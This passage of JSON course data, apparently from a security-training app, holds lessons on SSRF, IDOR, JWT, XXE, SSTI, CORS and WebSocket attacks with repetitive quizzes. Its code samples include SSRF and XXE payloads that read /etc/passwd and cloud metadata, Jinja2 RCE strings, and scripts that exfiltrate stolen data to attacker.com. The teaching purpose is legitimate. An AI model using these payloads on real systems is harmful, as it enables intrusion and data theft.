dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"ssrf-attacks","cat":"Web Application","title":"Server-Side Request Forgery (SSRF)","diff":2,"xp":200,"intro":"Make the server send requests on your behalf \u2014 reach internal services.","sections":[{"type":"text","content":"SSRF tricks the server into making HTTP requests to internal resources. Access metadata endpoints, internal APIs, or scan the internal network."},{"type":"code","lang":"bash","content":"# Basic SSRF test\ncurl 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/'\n# Internal port scan via SSRF\nfor port in 22 80 443 3306 6379 8080; do\n  curl -s 'https://target.com/fetch?url=http://127.0.0.1:'$port\ndone\n# SSRF to read files\ncurl 'https://target.com/fetch?url=file:///etc/passwd'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SSRF is dangerous because the request comes from...","opts":["Your browser","The server itself (trusted internal network)","A proxy","DNS"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"idor-attack","cat":"Web Application","title":"Insecure Direct Object Reference (IDOR)","diff":1,"xp":100,"intro":"Change an ID in the URL and access other users' data.","sections":[{"type":"text","content":"When the app uses predictable IDs (user/1, user/2) without checking authorization, you can access any user's data by changing the ID."},{"type":"code","lang":"bash","content":"# Original request (your profile)\nGET /api/user/1001/profile\n# IDOR: access another user's profile\nGET /api/user/1002/profile\n# Automate with Burp Intruder\n# Payload: numbers 1-10000\n# Look for 200 responses with other users' data\n# Also check: /api/order/123, /api/invoice/456, /download?file_id=789"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"IDOR is caused by missing...","opts":["Encryption","Authorization checks","Input validation","Rate limiting"],"ans":1},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"jwt-attacks","cat":"Web Application","title":"JWT Token Attacks","diff":2,"xp":200,"intro":"Forge, tamper, and crack JSON Web Tokens.","sections":[{"type":"text","content":"JWTs can be attacked: change alg to 'none', crack weak HMAC secrets, confuse RS256/HS256, or exploit missing expiration."},{"type":"code","lang":"bash","content":"# Decode a JWT (it's just base64)\necho 'eyJ...' | cut -d. -f2 | base64 -d 2>/dev/null | jq\n# Algorithm None attack\n# Change header to: {\"alg\":\"none\"}\n# Remove the signature\n# HMAC key cracking\nhashcat -m 16500 jwt.txt rockyou.txt\n# jwt_tool\npython3 jwt_tool.py JWT_TOKEN -C -d rockyou.txt"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"The 'alg: none' attack works when the server...","opts":["Uses RS256","Doesn't verify the algorithm field","Has a strong secret","Uses refresh tokens"],"ans":1},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"xxe-injection","cat":"Web Application","title":"XML External Entity (XXE) Injection","diff":2,"xp":200,"intro":"Read files and make requests via XML parsing.","sections":[{"type":"text","content":"If the app parses XML and external entities are enabled, inject a DTD that reads local files or makes server-side requests."},{"type":"code","lang":"xml","content":"<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n]>\n<root>\n  <data>&xxe;</data>\n</root>\n\n<!-- Blind XXE: exfiltrate via HTTP -->\n<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM \"http://attacker.com/?data=FILE_CONTENT\">\n]>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XXE requires the XML parser to...","opts":["Use JSON","Process external entities","Support XPath","Use XSLT"],"ans":1},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"ssti-attack","cat":"Web Application","title":"Server-Side Template Injection (SSTI)","diff":2,"xp":200,"intro":"Inject template syntax for remote code execution.","sections":[{"type":"text","content":"When user input is rendered inside a server-side template (Jinja2, Twig, Freemarker), inject template expressions for RCE."},{"type":"code","lang":"python","content":"# Detect SSTI: inject {{7*7}} \u2014 if you see 49, it's vulnerable\n# Jinja2 RCE payload:\n{{config.__class__.__init__.__globals__['os'].popen('id').read()}}\n# Twig RCE:\n{{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}\n# Detection payloads:\n{{7*7}}  ${7*7}  #{7*7}  *{7*7}  {{7*'7'}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SSTI is detected by injecting...","opts":["SQL queries","Template expressions like {{7*7}}","JavaScript","HTTP headers"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"cors-misconfiguration","cat":"Web Application","title":"CORS Misconfiguration","diff":1,"xp":100,"intro":"Steal data cross-origin when CORS headers are too permissive.","sections":[{"type":"text","content":"If the server reflects the Origin header in Access-Control-Allow-Origin with credentials allowed, any site can steal authenticated data."},{"type":"code","lang":"javascript","content":"// Exploit: steal data from victim's browser\nvar xhr = new XMLHttpRequest();\nxhr.open('GET', 'https://vulnerable-api.com/user/profile', true);\nxhr.withCredentials = true;\nxhr.onload = function() {\n  // Send stolen data to attacker\n  fetch('https://attacker.com/steal?data=' + btoa(xhr.responseText));\n};\nxhr.send();\n\n// Test: check CORS headers\n// curl -H 'Origin: https://evil.com' -I https://target.com/api"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"A dangerous CORS misconfiguration reflects...","opts":["Any origin with credentials allowed","Only trusted origins","No origin","The referer header"],"ans":0},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"http-request-smuggling","cat":"Web Application","title":"HTTP Request Smuggling","diff":3,"xp":250,"intro":"Exploit HTTP parsing differences between front-end and back-end.","sections":[{"type":"text","content":"When a proxy and backend disagree on where a request ends (Content-Length vs Transfer-Encoding), you can smuggle a second request inside the first."},{"type":"code","lang":"http","content":"POST / HTTP/1.1\nHost: target.com\nContent-Length: 13\nTransfer-Encoding: chunked\n\n0\n\nSMUGGLED REQUEST HERE"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Request smuggling exploits disagreement between...","opts":["Client and server","Front-end proxy and back-end server on request boundaries","DNS and HTTP","TCP and UDP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"websocket-attacks","cat":"Web Application","title":"WebSocket Security Attacks","diff":2,"xp":150,"intro":"WebSockets bypass same-origin \u2014 cross-site WebSocket hijacking.","sections":[{"type":"text","content":"WebSockets don't enforce same-origin policy by default. If the server doesn't verify the Origin header, any page can connect."},{"type":"code","lang":"javascript","content":"// Cross-Site WebSocket Hijacking\nvar ws = new WebSocket('wss://target.com/ws');\nws.onmessage = function(e) {\n  // Steal messages from victim's authenticated session\n  fetch('https://attacker.com/steal?msg=' + btoa(e.data));\n};\nws.onopen = function() {\n  ws.send('{\"action\":\"getProfile\"}');\n};"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"WebSocket hijacking works because WebSockets...","opts":["Are encrypted","Don't enforce same-origin policy by default","Use UDP","Require authentication"],"ans":1},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the 